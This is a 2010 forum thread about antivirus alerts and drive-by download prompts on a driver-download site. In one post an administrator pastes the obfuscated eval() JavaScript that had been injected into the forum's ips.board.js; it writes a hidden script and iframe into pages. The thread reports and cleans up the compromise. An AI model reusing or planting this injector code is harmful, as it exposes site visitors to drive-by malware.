bobwalt 0 Posted December 5, 2010 Report Share Posted December 5, 2010 I just had Norton tell me that the LaptopVideo2Go site has 2 drive by download threats - MSIE CrimePack Toolkit JavaClass Variant and MSIE CrimePack Toolkit JavaClass Variant. This happened after I was asked to install a Java update while I was on this site. Norton blocked the them but I thought you should know. There is a link on the report for websites to contact them. Bob Quote Link to post Share on other sites
coolguy16 0 Posted December 5, 2010 Report Share Posted December 5, 2010 (edited) Yes, this site gets hung up in Firefox when loading (waiting for missing Java plugins to be installed). I already have my Java up-to date. Do not install any plugin. Edited December 5, 2010 by coolguy16 Quote Link to post Share on other sites
feigned-existence 0 Posted December 5, 2010 Report Share Posted December 5, 2010 i got no problems reported by my anti-virus and its pretty damn good one! i even pay for it! ^_^ i personally use only this anti-virus i believe it has my back unlike some other ones i have tried i use NOD32 from ESET Quote Link to post Share on other sites
mrx 0 Posted December 5, 2010 Report Share Posted December 5, 2010 I use FireFox with NoScript. It's the only way to be sure java can't mess with you. Quote Link to post Share on other sites
BP13 0 Posted December 5, 2010 Report Share Posted December 5, 2010 (edited) I only noticed one thing. When I click on the forums button with firefox it hangs for a bit then a download dialog opens up asking me if I want to download a windows media playlist. The file name is something random like gfhjgfsdjfhfsjfhdakduhyadaudhadajdahj. I can't reproduce it at the moment as it's not happening anymore. It also says "Additional plugins are needed to display this page. Then I click Install and it returns "No suitable plugins were found" Edited December 5, 2010 by BP13 Quote Link to post Share on other sites
feigned-existence 0 Posted December 6, 2010 Report Share Posted December 6, 2010 I use FireFox with NoScript. It's the only way to be sure java can't mess with you. i also use firefox but i use adblock plus instead maybe that helps aswell. Quote Link to post Share on other sites
mobilenvidia 0 Posted December 6, 2010 Report Share Posted December 6, 2010 I'm using Chrome and no problems at all. Just installed latest version of FF and no issues with the site there either (default settings) IE8 also no issues. I have a feeling Norton is reporting a false positive, this is quite common for AVG. I've been using Vipre AV premium for the last 2 years this has been a very steady AV for me, even helped develop the Win7 version. But we take all these threats seriously will check the server that nothing has gotten through Quote Link to post Share on other sites
LSudlow 0 Posted December 6, 2010 Report Share Posted December 6, 2010 Avast was reporting a hit here most of last week but I just ignored it. I always scanned afterward and never found an infection. No hits reported here yesterday or today. Quote Link to post Share on other sites
bobwalt 0 Posted December 7, 2010 Author Report Share Posted December 7, 2010 I'm using Chrome and no problems at all. Just installed latest version of FF and no issues with the site there either (default settings) IE8 also no issues. I have a feeling Norton is reporting a false positive, this is quite common for AVG. I've been using Vipre AV premium for the last 2 years this has been a very steady AV for me, even helped develop the Win7 version. But we take all these threats seriously will check the server that nothing has gotten through Someone needs to contact Symatec as this site is now blocked by Norton Internet Security. In addition when I access the site anyway Norton shows my PC as being attacked by two items. Anyone who uses Norton will see your site as flagged as a known malware site when it comes up on a Google search. Bob Quote Link to post Share on other sites
BP13 0 Posted December 8, 2010 Report Share Posted December 8, 2010 Virus find: Direct Image: http://i56.tinypic.com/8xifqu.png Quote Link to post Share on other sites
Michael Marley 0 Posted December 8, 2010 Report Share Posted December 8, 2010 I have also gotten the Java thing and the .asx file a couple of times. I think something is up. Quote Link to post Share on other sites
mobilenvidia 0 Posted December 8, 2010 Report Share Posted December 8, 2010 I'm quite perplexed about this, I can't see anything that is causing this. I can only assume that either Adsense or Konterra ads are causing this. Or possibly a FF plugin (I'm running default FF) Quote Link to post Share on other sites
Michael Marley 0 Posted December 8, 2010 Report Share Posted December 8, 2010 I am using Adblock+, so it is unlikely that the ads are causing it for me. Quote Link to post Share on other sites
Teraphy 0 Posted December 8, 2010 Report Share Posted December 8, 2010 Wow, thanks everyone! I have everything turned off for this site in case things like this happen but I didn't get anything. I may have found something but we'll see if this still continues. I also forced a clean reset of skins and cached items. We'll take some extra measures as we definitely do not like this at all! Quote Link to post Share on other sites
mobilenvidia 0 Posted December 8, 2010 Report Share Posted December 8, 2010 I am using Adblock+, so it is unlikely that the ads are causing it for me. Adblock+ is also used by BP13, this could be a common link ? I'll grab this and have a study What subscriptions are you guys using for Adblock+ ? Quote Link to post Share on other sites
BP13 0 Posted December 8, 2010 Report Share Posted December 8, 2010 (edited) Adblock+ is also used by BP13, this could be a common link ? I'll grab this and have a study What subscriptions are you guys using for Adblock+ ? EasyList(USA) But remember this thing only popped up for me 3 times before. Seems that it does this at random times and not very often. Edited December 8, 2010 by BP13 Quote Link to post Share on other sites
Michael Marley 0 Posted December 8, 2010 Report Share Posted December 8, 2010 I also have EasyList. Quote Link to post Share on other sites
feigned-existence 0 Posted December 8, 2010 Report Share Posted December 8, 2010 i use fanboys list and easy list Quote Link to post Share on other sites
Teraphy 0 Posted December 9, 2010 Report Share Posted December 9, 2010 I received the issue. Quite interesting. Tracking it down now. I squashed it. It was found in ips.board.js which had the following code to include a script with src in the header and an iframe linking back to sites for downloading purposes. eval(function(m,c,h){function z(i){return(i< 62?'':z(parseInt(i/62)))+((i=i%62)>35?String.fromCharCode(i+29):i.toString(36))}for(var i=0;i< m.length;i++)h[z(i)]=m[i];function d(w){return h[w]?h[w]:w;};return c.replace(/\b\w+\b/g,d);}('var||lde|s91515|y460y4115y499y4114y4105y4112y4116y432y4115y4114y499y461y4104y4116y4116y4112y458y447y447y499y4108|y4105y499y4107y4113y446y4110y4101y4116y447y497y446y4106y4115y462y460y447y4115y499y4114y4105y4112|y4116y462|yeed9c|split|y4|for|sf7|length|String|fromCharCode|document|write'.split('|'),'0 2="";0 3="4"+"5"+"6";0 7=3.8("9");a(0 b=1;b<7.c;b++){2+=d.e(7[b])}f.g(2);',{})); Quote Link to post Share on other sites
mobilenvidia 0 Posted December 9, 2010 Report Share Posted December 9, 2010 Glad that is sorted, I'll sleep better tonight. Wonder why it never showed for me, I feel left out now :) Quote Link to post Share on other sites
bobwalt 0 Posted December 10, 2010 Author Report Share Posted December 10, 2010 Glad that is sorted, I'll sleep better tonight. Wonder why it never showed for me, I feel left out now :) Great! Someone now has to tell Norton so it takes the site off their know bad site list. Bob Quote Link to post Share on other sites
LSudlow 0 Posted December 11, 2010 Report Share Posted December 11, 2010 The one I was getting is back. See the attached PNG... Quote Link to post Share on other sites
Infinity7 0 Posted July 21, 2011 Report Share Posted July 21, 2011 The one I was getting is back. See the attached PNG... Oh, I wondered why when I first come to this site there is an all-black Windows Media Player window that opens and closes really fast at the bottom of my screen. Quote Link to post Share on other sites
H4ck 3D 0 Posted July 22, 2011 Report Share Posted July 22, 2011 Popular websites are always under threat from hackers :) Can't we all just get along? :):P Infinity7 was that something that happened recently? Quote Link to post Share on other sites
mobilenvidia 0 Posted July 23, 2011 Report Share Posted July 23, 2011 Oh, I wondered why when I first come to this site there is an all-black Windows Media Player window that opens and closes really fast at the bottom of my screen. At the very bottom of the forum screens is a NVIDIA gaming ad, this is probably what you are seeing and blocking ? We should be bug free at this point in time, even the URL123.info is fixed. And yes, more popular more bugs trying to get in :) Quote Link to post Share on other sites
Recommended Posts